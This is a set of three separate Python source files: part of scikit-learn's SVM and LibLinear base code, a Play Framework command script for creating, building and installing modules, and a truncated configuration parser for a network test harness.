# NOTE: _validate_for_predict contains check for is_fitted
# hence must be placed before any other attributes are used.
X = self._validate_for_predict(X)
X = self._compute_kernel(X)
if self._sparse:
dec_func = self._sparse_decision_function(X)
else:
dec_func = self._dense_decision_function(X)
# In binary case, we need to flip the sign of coef, intercept and
# decision function.
if self._impl in ['c_svc', 'nu_svc'] and len(self.classes_) == 2:
return -dec_func.ravel()
return dec_func
def _dense_decision_function(self, X):
X = check_array(X, dtype=np.float64, order="C")
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
return libsvm.decision_function(
X, self.support_, self.support_vectors_, self.n_support_,
self._dual_coef_, self._intercept_,
self.probA_, self.probB_,
svm_type=LIBSVM_IMPL.index(self._impl),
kernel=kernel, degree=self.degree, cache_size=self.cache_size,
coef0=self.coef0, gamma=self._gamma)
def _sparse_decision_function(self, X):
X.data = np.asarray(X.data, dtype=np.float64, order='C')
kernel = self.kernel
if hasattr(kernel, '__call__'):
kernel = 'precomputed'
kernel_type = self._sparse_kernels.index(kernel)
return libsvm_sparse.libsvm_sparse_decision_function(
X.data, X.indices, X.indptr,
self.support_vectors_.data,
self.support_vectors_.indices,
self.support_vectors_.indptr,
self._dual_coef_.data, self._intercept_,
LIBSVM_IMPL.index(self._impl), kernel_type,
self.degree, self._gamma, self.coef0, self.tol,
self.C, self.class_weight_,
self.nu, self.epsilon, self.shrinking,
self.probability, self.n_support_,
self.probA_, self.probB_)
def _validate_for_predict(self, X):
check_is_fitted(self, 'support_')
X = check_array(X, accept_sparse='csr', dtype=np.float64, order="C")
if self._sparse and not sp.isspmatrix(X):
X = sp.csr_matrix(X)
if self._sparse:
X.sort_indices()
if sp.issparse(X) and not self._sparse and not callable(self.kernel):
raise ValueError(
"cannot use sparse input in %r trained on dense data"
% type(self).__name__)
n_samples, n_features = X.shape
if self.kernel == "precomputed":
if X.shape[1] != self.shape_fit_[0]:
raise ValueError("X.shape[1] = %d should be equal to %d, "
"the number of samples at training time" %
(X.shape[1], self.shape_fit_[0]))
elif n_features != self.shape_fit_[1]:
raise ValueError("X.shape[1] = %d should be equal to %d, "
"the number of features at training time" %
(n_features, self.shape_fit_[1]))
return X
@property
def coef_(self):
if self.kernel != 'linear':
raise ValueError('coef_ is only available when using a '
'linear kernel')
coef = self._get_coef()
# coef_ being a read-only property, it's better to mark the value as
# immutable to avoid hiding potential bugs for the unsuspecting user.
if sp.issparse(coef):
# sparse matrix do not have global flags
coef.data.flags.writeable = False
else:
# regular dense array
coef.flags.writeable = False
return coef
def _get_coef(self):
return safe_sparse_dot(self._dual_coef_, self.support_vectors_)
class BaseSVC(six.with_metaclass(ABCMeta, BaseLibSVM, ClassifierMixin)):
"""ABC for LibSVM-based classifiers."""
@abstractmethod
def __init__(self, impl, kernel, degree, gamma, coef0, tol, C, nu,
shrinking, probability, cache_size, class_weight, verbose,
max_iter, decision_function_shape, random_state):
self.decision_function_shape = decision_function_shape
super(BaseSVC, self).__init__(
impl=impl, kernel=kernel, degree=degree, gamma=gamma, coef0=coef0,
tol=tol, C=C, nu=nu, epsilon=0., shrinking=shrinking,
probability=probability, cache_size=cache_size,
class_weight=class_weight, verbose=verbose, max_iter=max_iter,
random_state=random_state)
def _validate_targets(self, y):
y_ = column_or_1d(y, warn=True)
cls, y = np.unique(y_, return_inverse=True)
self.class_weight_ = compute_class_weight(self.class_weight, cls, y_)
if len(cls) < 2:
raise ValueError(
"The number of classes has to be greater than one; got %d"
% len(cls))
self.classes_ = cls
return np.asarray(y, dtype=np.float64, order='C')
def decision_function(self, X):
"""Distance of the samples X to the separating hyperplane.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Returns
-------
X : array-like, shape (n_samples, n_classes * (n_classes-1) / 2)
Returns the decision function of the sample for each class
in the model.
If decision_function_shape='ovr', the shape is (n_samples,
n_classes)
"""
dec = self._decision_function(X)
if self.decision_function_shape is None and len(self.classes_) > 2:
warnings.warn("The decision_function_shape default value will "
"change from 'ovo' to 'ovr' in 0.18. This will change "
"the shape of the decision function returned by "
"SVC.", ChangedBehaviorWarning)
if self.decision_function_shape == 'ovr':
return _ovr_decision_function(dec < 0, dec, len(self.classes_))
return dec
def predict(self, X):
"""Perform classification on samples in X.
For an one-class model, +1 or -1 is returned.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train]
Returns
-------
y_pred : array, shape (n_samples,)
Class labels for samples in X.
"""
y = super(BaseSVC, self).predict(X)
return self.classes_.take(np.asarray(y, dtype=np.intp))
# Hacky way of getting predict_proba to raise an AttributeError when
# probability=False using properties. Do not use this in new code; when
# probabilities are not available depending on a setting, introduce two
# estimators.
def _check_proba(self):
if not self.probability or self.probA_.size == 0 or self.probB_.size == 0:
raise AttributeError("predict_proba is not available when fitted with"
" probability=False")
if self._impl not in ('c_svc', 'nu_svc'):
raise AttributeError("predict_proba only implemented for SVC"
" and NuSVC")
@property
def predict_proba(self):
"""Compute probabilities of possible outcomes for samples in X.
The model need to have probability information computed at training
time: fit with attribute `probability` set to True.
Parameters
----------
X : array-like, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train]
Returns
-------
T : array-like, shape (n_samples, n_classes)
Returns the probability of the sample for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute `classes_`.
Notes
-----
The probability model is created using cross validation, so
the results can be slightly different than those obtained by
predict. Also, it will produce meaningless results on very small
datasets.
"""
self._check_proba()
return self._predict_proba
def _predict_proba(self, X):
X = self._validate_for_predict(X)
pred_proba = (self._sparse_predict_proba
if self._sparse else self._dense_predict_proba)
return pred_proba(X)
@property
def predict_log_proba(self):
"""Compute log probabilities of possible outcomes for samples in X.
The model need to have probability information computed at training
time: fit with attribute `probability` set to True.
Parameters
----------
X : array-like, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train]
Returns
-------
T : array-like, shape (n_samples, n_classes)
Returns the log-probabilities of the sample for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute `classes_`.
Notes
-----
The probability model is created using cross validation, so
the results can be slightly different than those obtained by
predict. Also, it will produce meaningless results on very small
datasets.
"""
self._check_proba()
return self._predict_log_proba
def _predict_log_proba(self, X):
return np.log(self.predict_proba(X))
def _dense_predict_proba(self, X):
X = self._compute_kernel(X)
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
svm_type = LIBSVM_IMPL.index(self._impl)
pprob = libsvm.predict_proba(
X, self.support_, self.support_vectors_, self.n_support_,
self._dual_coef_, self._intercept_,
self.probA_, self.probB_,
svm_type=svm_type, kernel=kernel, degree=self.degree,
cache_size=self.cache_size, coef0=self.coef0, gamma=self._gamma)
return pprob
def _sparse_predict_proba(self, X):
X.data = np.asarray(X.data, dtype=np.float64, order='C')
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
kernel_type = self._sparse_kernels.index(kernel)
return libsvm_sparse.libsvm_sparse_predict_proba(
X.data, X.indices, X.indptr,
self.support_vectors_.data,
self.support_vectors_.indices,
self.support_vectors_.indptr,
self._dual_coef_.data, self._intercept_,
LIBSVM_IMPL.index(self._impl), kernel_type,
self.degree, self._gamma, self.coef0, self.tol,
self.C, self.class_weight_,
self.nu, self.epsilon, self.shrinking,
self.probability, self.n_support_,
self.probA_, self.probB_)
def _get_coef(self):
if self.dual_coef_.shape[0] == 1:
# binary classifier
coef = safe_sparse_dot(self.dual_coef_, self.support_vectors_)
else:
# 1vs1 classifier
coef = _one_vs_one_coef(self.dual_coef_, self.n_support_,
self.support_vectors_)
if sp.issparse(coef[0]):
coef = sp.vstack(coef).tocsr()
else:
coef = np.vstack(coef)
return coef
def _get_liblinear_solver_type(multi_class, penalty, loss, dual):
"""Find the liblinear magic number for the solver.
This number depends on the values of the following attributes:
- multi_class
- penalty
- loss
- dual
The same number is also internally used by LibLinear to determine
which solver to use.
"""
# nested dicts containing level 1: available loss functions,
# level2: available penalties for the given loss functin,
# level3: wether the dual solver is available for the specified
# combination of loss function and penalty
_solver_type_dict = {
'logistic_regression': {
'l1': {False: 6},
'l2': {False: 0, True: 7}},
'hinge': {
'l2': {True: 3}},
'squared_hinge': {
'l1': {False: 5},
'l2': {False: 2, True: 1}},
'epsilon_insensitive': {
'l2': {True: 13}},
'squared_epsilon_insensitive': {
'l2': {False: 11, True: 12}},
'crammer_singer': 4
}
if multi_class == 'crammer_singer':
return _solver_type_dict[multi_class]
elif multi_class != 'ovr':
raise ValueError("`multi_class` must be one of `ovr`, "
"`crammer_singer`, got %r" % multi_class)
# FIXME loss.lower() --> loss in 0.18
_solver_pen = _solver_type_dict.get(loss.lower(), None)
if _solver_pen is None:
error_string = ("loss='%s' is not supported" % loss)
else:
# FIME penalty.lower() --> penalty in 0.18
_solver_dual = _solver_pen.get(penalty.lower(), None)
if _solver_dual is None:
error_string = ("The combination of penalty='%s'"
"and loss='%s' is not supported"
% (penalty, loss))
else:
solver_num = _solver_dual.get(dual, None)
if solver_num is None:
error_string = ("loss='%s' and penalty='%s'"
"are not supported when dual=%s"
% (penalty, loss, dual))
else:
return solver_num
raise ValueError('Unsupported set of arguments: %s, '
'Parameters: penalty=%r, loss=%r, dual=%r'
% (error_string, penalty, loss, dual))
def _fit_liblinear(X, y, C, fit_intercept, intercept_scaling, class_weight,
penalty, dual, verbose, max_iter, tol,
random_state=None, multi_class='ovr',
loss='logistic_regression', epsilon=0.1):
"""Used by Logistic Regression (and CV) and LinearSVC.
Preprocessing is done in this function before supplying it to liblinear.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples,)
Target vector relative to X
C : float
Inverse of cross-validation parameter. Lower the C, the more
the penalization.
fit_intercept : bool
Whether or not to fit the intercept, that is to add a intercept
term to the decision function.
intercept_scaling : float
LibLinear internally penalizes the intercept and this term is subject
to regularization just like the other terms of the feature vector.
In order to avoid this, one should increase the intercept_scaling.
such that the feature vector becomes [x, intercept_scaling].
class_weight : {dict, 'balanced'}, optional
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
penalty : str, {'l1', 'l2'}
The norm of the penalty used in regularization.
dual : bool
Dual or primal formulation,
verbose : int
Set verbose to any positive number for verbosity.
max_iter : int
Number of iterations.
tol : float
Stopping condition.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use when
shuffling the data.
multi_class : str, {'ovr', 'crammer_singer'}
`ovr` trains n_classes one-vs-rest classifiers, while `crammer_singer`
optimizes a joint objective over all classes.
While `crammer_singer` is interesting from an theoretical perspective
as it is consistent it is seldom used in practice and rarely leads to
better accuracy and is more expensive to compute.
If `crammer_singer` is chosen, the options loss, penalty and dual will
be ignored.
loss : str, {'logistic_regression', 'hinge', 'squared_hinge',
'epsilon_insensitive', 'squared_epsilon_insensitive}
The loss function used to fit the model.
epsilon : float, optional (default=0.1)
Epsilon parameter in the epsilon-insensitive loss function. Note
that the value of this parameter depends on the scale of the target
variable y. If unsure, set epsilon=0.
Returns
-------
coef_ : ndarray, shape (n_features, n_features + 1)
The coefficent vector got by minimizing the objective function.
intercept_ : float
The intercept term added to the vector.
n_iter_ : int
Maximum number of iterations run across all classes.
"""
# FIXME Remove case insensitivity in 0.18 ---------------------
loss_l, penalty_l = loss.lower(), penalty.lower()
msg = ("loss='%s' has been deprecated in favor of "
"loss='%s' as of 0.16. Backward compatibility"
" for the uppercase notation will be removed in %s")
if (not loss.islower()) and loss_l not in ('l1', 'l2'):
warnings.warn(msg % (loss, loss_l, "0.18"),
DeprecationWarning)
if not penalty.islower():
warnings.warn(msg.replace("loss", "penalty")
% (penalty, penalty_l, "0.18"),
DeprecationWarning)
# -------------------------------------------------------------
# FIXME loss_l --> loss in 0.18
if loss_l not in ['epsilon_insensitive', 'squared_epsilon_insensitive']:
enc = LabelEncoder()
y_ind = enc.fit_transform(y)
classes_ = enc.classes_
if len(classes_) < 2:
raise ValueError("This solver needs samples of at least 2 classes"
" in the data, but the data contains only one"
" class: %r" % classes_[0])
class_weight_ = compute_class_weight(class_weight, classes_, y)
else:
class_weight_ = np.empty(0, dtype=np.float)
y_ind = y
liblinear.set_verbosity_wrap(verbose)
rnd = check_random_state(random_state)
if verbose:
print('[LibLinear]', end='')
# LinearSVC breaks when intercept_scaling is <= 0
bias = -1.0
if fit_intercept:
if intercept_scaling <= 0:
raise ValueError("Intercept scaling is %r but needs to be greater than 0."
" To disable fitting an intercept,"
" set fit_intercept=False." % intercept_scaling)
else:
bias = intercept_scaling
libsvm.set_verbosity_wrap(verbose)
libsvm_sparse.set_verbosity_wrap(verbose)
liblinear.set_verbosity_wrap(verbose)
# LibLinear wants targets as doubles, even for classification
y_ind = np.asarray(y_ind, dtype=np.float64).ravel()
solver_type = _get_liblinear_solver_type(multi_class, penalty, loss, dual)
raw_coef_, n_iter_ = liblinear.train_wrap(
X, y_ind, sp.isspmatrix(X), solver_type, tol, bias, C,
class_weight_, max_iter, rnd.randint(np.iinfo('i').max),
epsilon)
# Regarding rnd.randint(..) in the above signature:
# seed for srand in range [0..INT_MAX); due to limitations in Numpy
# on 32-bit platforms, we can't get to the UINT_MAX limit that
# srand supports
n_iter_ = max(n_iter_)
if n_iter_ >= max_iter and verbose > 0:
warnings.warn("Liblinear failed to converge, increase "
"the number of iterations.", ConvergenceWarning)
if fit_intercept:
coef_ = raw_coef_[:, :-1]
intercept_ = intercept_scaling * raw_coef_[:, -1]
else:
coef_ = raw_coef_
intercept_ = 0.
return coef_, intercept_, n_iter_
|
|
import os
import sys
import re
import zipfile
import urllib2
import shutil
import string
import imp
import time
import urllib
import yaml
from play.utils import *
NM = ['new-module', 'nm']
LM = ['list-modules', 'lm']
BM = ['build-module', 'bm']
AM = ['add']
IM = ['install']
COMMANDS = NM + LM + BM + IM + AM
HELP = {
'new-module': "Create a module",
'build-module': "Build and package a module",
'list-modules': "List modules available from the central modules repository",
'install': "Install a module"
}
DEFAULT_REPO = 'http://www.playframework.org'
def load_module(name):
base = os.path.normpath(os.path.dirname(os.path.realpath(sys.argv[0])))
mod_desc = imp.find_module(name, [os.path.join(base, 'framework/pym')])
return imp.load_module(name, mod_desc[0], mod_desc[1], mod_desc[2])
json = load_module('simplejson')
repositories = []
def execute(**kargs):
global repositories
command = kargs.get("command")
app = kargs.get("app")
args = kargs.get("args")
env = kargs.get("env")
repositories = get_repositories(env['basedir'])
if command in NM:
new(app, args, env)
elif command in LM:
list(app, args)
elif command in BM:
build(app, args, env)
elif command in IM:
install(app, args, env)
elif command in AM:
add(app, args, env)
def get_repositories(play_base):
repopath = os.path.join(play_base, 'repositories')
if os.path.exists(repopath):
repos = []
f = file(repopath)
for line in f:
if not re.match("^\s*#", line) and not line.strip() == "":
repos.append(line.strip())
if len(repos) > 0:
return repos
return [DEFAULT_REPO]
class Downloader(object):
before = .0
history = []
cycles = 0
average = lambda self: sum(self.history) / (len(self.history) or 1)
def __init__(self, width=55):
self.width = width
self.kibi = lambda bits: bits / 2 ** 10
self.proc = lambda a, b: a / (b * 0.01)
def retrieve(self, url, destination, callback=None):
self.size = 0
time.clock()
try: urllib.urlretrieve(url, destination, self.progress)
except KeyboardInterrupt:
print '\n~ Download cancelled'
print '~'
for i in range(5):
try:
os.remove(destination)
break
except:
time.sleep(.1)
else: raise
if callback: callback()
sys.exit()
print ''
return self.size
def progress(self, blocks, blocksize, filesize):
self.cycles += 1
bits = min(blocks*blocksize, filesize)
if bits != filesize:
done = self.proc(bits, filesize)
else:
done = 100
bar = self.bar(done)
if not self.cycles % 3 and bits != filesize:
now = time.clock()
elapsed = now-self.before
if elapsed:
speed = self.kibi(blocksize * 3 / elapsed)
self.history.append(speed)
self.history = self.history[-4:]
self.before = now
average = round(sum(self.history[-4:]) / 4, 1)
self.size = self.kibi(bits)
print '\r~ [%s] %s KiB/s ' % (bar, str(average)),
def bar(self, done):
span = self.width * done * 0.01
offset = len(str(int(done))) - .99
result = ('%d%%' % (done,)).center(self.width)
return result.replace(' ', '-', int(span - offset))
class Unzip:
def __init__(self, verbose = False, percent = 10):
self.verbose = verbose
self.percent = percent
def extract(self, file, dir):
if not dir.endswith(':') and not os.path.exists(dir):
os.mkdir(dir)
zf = zipfile.ZipFile(file)
# create directory structure to house files
self._createstructure(file, dir)
num_files = len(zf.namelist())
percent = self.percent
divisions = 100 / percent
perc = int(num_files / divisions)
# extract files to directory structure
for i, name in enumerate(zf.namelist()):
if self.verbose == True:
print "Extracting %s" % name
elif perc > 0 and (i % perc) == 0 and i > 0:
complete = int (i / perc) * percent
if not name.endswith('/'):
outfile = open(os.path.join(dir, name), 'wb')
outfile.write(zf.read(name))
outfile.flush()
outfile.close()
def _createstructure(self, file, dir):
self._makedirs(self._listdirs(file), dir)
def _makedirs(self, directories, basedir):
""" Create any directories that don't currently exist """
for dir in directories:
curdir = os.path.join(basedir, dir)
if not os.path.exists(curdir):
os.makedirs(curdir)
def _listdirs(self, file):
""" Grabs all the directories in the zip structure
This is necessary to create the structure before trying
to extract the file to it. """
zf = zipfile.ZipFile(file)
dirs = []
for name in zf.namelist():
dn = os.path.dirname(name)
dirs.append(dn)
dirs.sort()
return dirs
def new(app, args, play_env):
if os.path.exists(app.path):
print "~ Oops. %s already exists" % app.path
print "~"
sys.exit(-1)
print "~ The new module will be created in %s" % os.path.normpath(app.path)
print "~"
application_name = os.path.basename(app.path)
copy_directory(os.path.join(play_env["basedir"], 'resources/module-skel'), app.path)
# check_application()
replaceAll(os.path.join(app.path, 'build.xml'), r'%MODULE%', application_name)
replaceAll(os.path.join(app.path, 'commands.py'), r'%MODULE%', application_name)
replaceAll(os.path.join(app.path, 'conf/messages'), r'%MODULE%', application_name)
replaceAll(os.path.join(app.path, 'conf/dependencies.yml'), r'%MODULE%', application_name)
replaceAll(os.path.join(app.path, 'conf/routes'), r'%MODULE%', application_name)
replaceAll(os.path.join(app.path, 'conf/routes'), r'%MODULE_LOWERCASE%', string.lower(application_name))
os.mkdir(os.path.join(app.path, 'app'))
os.mkdir(os.path.join(app.path, 'app/controllers'))
os.mkdir(os.path.join(app.path, 'app/controllers/%s' % application_name))
os.mkdir(os.path.join(app.path, 'app/models'))
os.mkdir(os.path.join(app.path, 'app/models/%s' % application_name))
os.mkdir(os.path.join(app.path, 'app/views'))
os.mkdir(os.path.join(app.path, 'app/views/%s' % application_name))
os.mkdir(os.path.join(app.path, 'app/views/tags'))
os.mkdir(os.path.join(app.path, 'app/views/tags/%s' % application_name))
os.mkdir(os.path.join(app.path, 'src/play'))
os.mkdir(os.path.join(app.path, 'src/play/modules'))
os.mkdir(os.path.join(app.path, 'src/play/modules/%s' % application_name))
print "~ OK, the module is created."
print "~ Start using it by adding this line in the application.conf modules list: "
print "~ module.%s=%s" % (application_name, os.path.normpath(app.path))
print "~"
print "~ Have fun!"
print "~"
def list(app, args):
print "~ You can also browse this list online at:"
for repo in repositories:
print "~ %s/modules" % repo
print "~"
modules_list = load_module_list()
for mod in modules_list:
print "~ [%s]" % mod['name']
print "~ %s" % mod['fullname']
print "~ %s/modules/%s" % (mod['server'], mod['name'])
vl = ''
i = 0
for v in mod['versions']:
vl += v["version"]
i = i+1
if i < len(mod['versions']):
vl += ', '
if vl:
print "~ Versions: %s" % vl
else:
print "~ (No versions released yet)"
print "~"
print "~ To install one of these modules use:"
print "~ play install module-version (eg: play install scala-1.0)"
print "~"
print "~ Or you can just install the default release of a module using:"
print "~ play install module (eg: play install scala)"
print "~"
def build(app, args, env):
ftb = env["basedir"]
version = None
fwkMatch = None
try:
optlist, args = getopt.getopt(args, '', ['framework=', 'version=', 'require='])
for o, a in optlist:
if o in ('--framework'):
ftb = a
if o in ('--version'):
version = a
if o in ('--require'):
fwkMatch = a
except getopt.GetoptError, err:
print "~ %s" % str(err)
print "~ "
sys.exit(-1)
deps_file = os.path.join(app.path, 'conf', 'dependencies.yml')
if os.path.exists(deps_file):
f = open(deps_file)
deps = yaml.load(f.read())
versionCandidate = deps["self"].split(" ").pop()
version = versionCandidate
for dep in deps["require"]:
if isinstance(dep, basestring):
splitted = dep.split(" ")
if len(splitted) == 2 and splitted[0] == "play":
fwkMatch = splitted[1]
f.close
if version is None:
version = raw_input("~ What is the module version number? ")
if fwkMatch is None:
fwkMatch = raw_input("~ What are the playframework versions required? ")
build_file = os.path.join(app.path, 'build.xml')
if os.path.exists(build_file):
print "~"
print "~ Building..."
print "~"
os.system('ant -f %s -Dplay.path=%s' % (build_file, ftb) )
print "~"
mv = '%s-%s' % (os.path.basename(app.path), version)
print("~ Packaging %s ... " % mv)
dist_dir = os.path.join(app.path, 'dist')
if os.path.exists(dist_dir):
shutil.rmtree(dist_dir)
os.mkdir(dist_dir)
manifest = os.path.join(app.path, 'manifest')
manifestF = open(manifest, 'w')
manifestF.write('version=%s\nframeworkVersions=%s\n' % (version, fwkMatch))
manifestF.close()
zip = zipfile.ZipFile(os.path.join(dist_dir, '%s.zip' % mv), 'w', zipfile.ZIP_STORED)
for (dirpath, dirnames, filenames) in os.walk(app.path):
if dirpath == dist_dir:
continue
if dirpath.find(os.sep + '.') > -1 or dirpath.find('/tmp/') > -1 or dirpath.find('/test-result/') > -1 or dirpath.find('/logs/') > -1 or dirpath.find('/eclipse/') > -1 or dirpath.endswith('/test-result') or dirpath.endswith('/logs') or dirpath.endswith('/eclipse') or dirpath.endswith('/nbproject'):
continue
for file in filenames:
if file.find('~') > -1 or file.endswith('.iml') or file.startswith('.'):
continue
zip.write(os.path.join(dirpath, file), os.path.join(dirpath[len(app.path):], file))
zip.close()
os.remove(manifest)
print "~"
print "~ Done!"
print "~ Package is available at %s" % os.path.join(dist_dir, '%s.zip' % mv)
print "~"
def install(app, args, env):
if len(sys.argv) < 3:
help_file = os.path.join(env["basedir"], 'documentation/commands/cmd-install.txt')
print open(help_file, 'r').read()
sys.exit(0)
name = cmd = sys.argv[2]
groups = re.match(r'^([a-zA-Z0-9]+)([-](.*))?$', name)
module = groups.group(1)
version = groups.group(3)
modules_list = load_module_list()
fetch = None
for mod in modules_list:
if mod['name'] == module:
for v in mod['versions']:
if version is None and v['isDefault']:
print '~ Will install %s-%s' % (module, v['version'])
print '~ This module is compatible with: %s' % v['matches']
ok = raw_input('~ Do you want to install this version (y/n)? ')
if not ok == 'y':
print '~'
sys.exit(-1)
print '~ Installing module %s-%s...' % (module, v['version'])
fetch = '%s/modules/%s-%s.zip' % (mod['server'], module, v['version'])
break
if version == v['version']:
print '~ Will install %s-%s' % (module, v['version'])
print '~ This module is compatible with: %s' % v['matches']
ok = raw_input('~ Do you want to install this version (y/n)? ')
if not ok == 'y':
print '~'
sys.exit(-1)
print '~ Installing module %s-%s...' % (module, v['version'])
fetch = '%s/modules/%s-%s.zip' % (mod['server'], module, v['version'])
break
if fetch is None:
print '~ No module found \'%s\'' % name
print '~ Try play list-modules to get the modules list'
print '~'
sys.exit(-1)
archive = os.path.join(env["basedir"], 'modules/%s-%s.zip' % (module, v['version']))
if os.path.exists(archive):
os.remove(archive)
print '~'
print '~ Fetching %s' % fetch
Downloader().retrieve(fetch, archive)
if not os.path.exists(archive):
print '~ Oops, file does not exist'
print '~'
sys.exist(-1)
print '~ Unzipping...'
if os.path.exists(os.path.join(env["basedir"], 'modules/%s-%s' % (module, v['version']))):
shutil.rmtree(os.path.join(env["basedir"], 'modules/%s-%s' % (module, v['version'])))
os.mkdir(os.path.join(env["basedir"], 'modules/%s-%s' % (module, v['version'])))
Unzip().extract(archive, os.path.join(env["basedir"], 'modules/%s-%s' % (module, v['version'])))
os.remove(archive)
print '~'
print '~ Module %s-%s is installed!' % (module, v['version'])
print '~ You can now use it by adding it to the dependencies.yml file:'
print '~'
print '~ require:'
print '~ play -> %s %s' % (module, v['version'])
print '~'
sys.exit(0)
def add(app, args, env):
app.check()
m = None
try:
optlist, args = getopt.getopt(args, '', ['module='])
for o, a in optlist:
if o in ('--module'):
m = a
except getopt.GetoptError, err:
print "~ %s" % str(err)
print "~ "
sys.exit(-1)
if m is None:
print "~ Usage: play add --module=<modulename>"
print "~ "
sys.exit(-1)
appConf = os.path.join(app.path, 'conf/application.conf')
if not fileHas(appConf, '# ---- MODULES ----'):
print "~ Line '---- MODULES ----' missing in your application.conf. Add it to use this command."
print "~ "
sys.exit(-1)
mn = m
if mn.find('-') > 0:
mn = mn[:mn.find('-')]
if mn in app.module_names():
print "~ Module %s already declared in application.conf, not doing anything." % mn
print "~ "
sys.exit(-1)
replaceAll(appConf, r'# ---- MODULES ----', '# ---- MODULES ----\nmodule.%s=${play.path}/modules/%s' % (mn, m) )
print "~ Module %s add to application %s." % (mn, app.name())
print "~ "
def load_module_list():
def addServer(module, server):
module['server'] = server
return module
def any(arr, func):
for x in arr:
if func(x): return True
return False
modules = None
rev = repositories[:] # clone
rev.reverse()
for repo in rev:
result = load_modules_from(repo)
if modules is None:
modules = map(lambda m: addServer(m, repo), result['modules'])
else:
for module in result['modules']:
if not any(modules, lambda m: m['name'] == module['name']):
modules.append(addServer(module, repo))
return modules
def load_modules_from(modules_server):
try:
url = '%s/modules' % modules_server
req = urllib2.Request(url)
req.add_header('Accept', 'application/json')
result = urllib2.urlopen(req)
return json.loads(result.read())
except urllib2.HTTPError, e:
print "~ Oops,"
print "~ Cannot fetch the modules list from %s (%s)..." % (url, e.code)
print "~"
sys.exit(-1)
except urllib2.URLError, e:
print "~ Oops,"
print "~ Cannot fetch the modules list from %s ..." % (url)
print "~"
sys.exit(-1)
|
|
'''
Created on Oct 4, 2016
@author: Marc Pucci
'''
# TODO
# This library was initially common to gen_test and tmgr/tnode.
# it split when I separated configuration from test
# they need to become common again
import json
import collections
# host is specified as either name:port or /tmp/socket. In the latter case, port is None
# bind is the binding address for host listeners
# tcp and udp are lists of ports to listen on
Nodename = collections.namedtuple('Nodename', 'host, port, bind, tcp, udp' )
class parser:
bgprouters = {} # hosts that are routers, not listeners, but we may want to send commands to anyway
tests = {} # holds details for named tests
participants = {} # address of participant
hosts = {} # address of a data source or sync host
def __init__(self, cfile):
try:
f = open(cfile)
except Exception, e:
raise Exception('cannot open configuration file: ' + cfile + ': ' + repr(e))
lines = 0
for line in f:
lines += 1
line = line.partition('#')[0]
gather = []
if "{" in line:
got = False
for line2 in f:
line2 = line2.partition('#')[0]
lines += 1
if '}' in line2:
got = True
break
gather.append(line2)
if not got:
f.close()
raise Exception('Fatal error on line ' + str(lines) + ': unmatched { ... }')
try:
self._parse(line, gather)
except Exception as err:
f.close()
raise Exception('Fatal error on line ' + str(lines) + ': ' + line + ' (' + str(err) + ')')
f.close
def _parse (self, line, gather):
tokens = line.split()
if len(tokens) == 0:
return
if tokens[0] == 'participants':
self._do_participants(tokens, gather)
elif tokens[0] == 'flow':
self._do_flow(tokens)
elif tokens[0] == 'announce':
self._do_announce(tokens)
elif tokens[0] == 'test':
self._do_test(tokens, gather)
elif tokens[0] == 'listener':
self._do_listener(tokens)
elif tokens[0] == 'hosts':
self._do_hosts(tokens, gather)
elif tokens[0] == 'bgprouters':
self._do_bgprouters(tokens, gather)
else:
raise Exception('unrecognized command')
def _do_bgprouters (self, args, gather):
if len(args) != 2 or args[1] != "{":
raise Exception('usage: bgprouters {\n host=name:port | /named/pipe\n }\n ')
for line in gather:
n, t = self.getname(line)
if n is None:
continue
self.bgprouters[n] = t
#print self.bgprouters
def _do_hosts (self, args, gather):
if len(args) != 2 or args[1] != "{":
raise Exception('usage: hosts {\n host=name:port | /named/pipe\n }\n ')
for line in gather:
n, t = self.getname(line)
if n is None:
continue
self.hosts[n] = t
#print self.hosts
def _do_participants (self, args, gather):
if len(args) != 2 or args[1] != "{":
raise Exception('usage: participants {\n host=name:port | /named/pipe\n }\n ')
for line in gather:
n, t = self.getname(line)
if n is None:
continue
self.participants[n] = t
#print self.participants
def getname (self, arg):
arg = arg.partition('#')[0].strip('\n')
args = arg.split()
if len(args) == 0:
return None, None
if len(args) == 1:
raise Exception('name host:port | /named/pipe [ bind_address [ tcp_ports ... ] ]')
# print(args)
name = args[0]
addr = args[1]
port = None
bind = None
tcp = []
udp = []
addr_port = addr.partition(':')
if len(addr_port) == 3 and addr_port[1] == ':':
addr = addr_port[0]
port = addr_port[2]
if len(args) >= 3:
bind = args[2]
for i in range(3, len(args)):
tcp.append(args[i])
# print(name + " " + addr + ' ' + str(port) + ' ' + str(bind) + ' ' + str(tcp) + ' ' + str(udp))
return name, Nodename(addr, port, bind, tcp, udp)
def _do_flow (self, args):
if args[3] == '>>':
self._outbound(args[1], args[2], args[4])
elif args[2] == '<<':
self._inbound(args[1], args[3])
else:
raise Exception('bad flow format')
def _get_policy (self, name):
try:
policy = self.policies[name]
except:
policy = {}
policy["outbound"] = []
policy["inbound"] = []
self.policies[name] = policy
return policy
def _inbound (self, dst, port):
#print 'inbound: dst=' + dst + ' port=' + port
das, dasport = host2as_router(dst)
n = as2part(das)
policy = self._get_policy(n)
tmp_policy = {}
tmp_policy["cookie"] = self.cookie_id
self.cookie_id += 1
tmp_policy["match"] = {}
tmp_policy["match"]["tcp_dst"] = int(port)
tmp_policy["action"] = {"fwd": int(dasport)}
# Add this to participants' outbound policies
policy["inbound"].append(tmp_policy)
def _outbound (self, src, port, dst):
#print 'outbound: src=' + src + ' port=' + port + ' dst=' + dst
sas, sasport = host2as_router(src)
das = dst # destination is an AS not a host !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
#print 'sas=' + sas + ' sasport=' + sasport + ' das=' + das
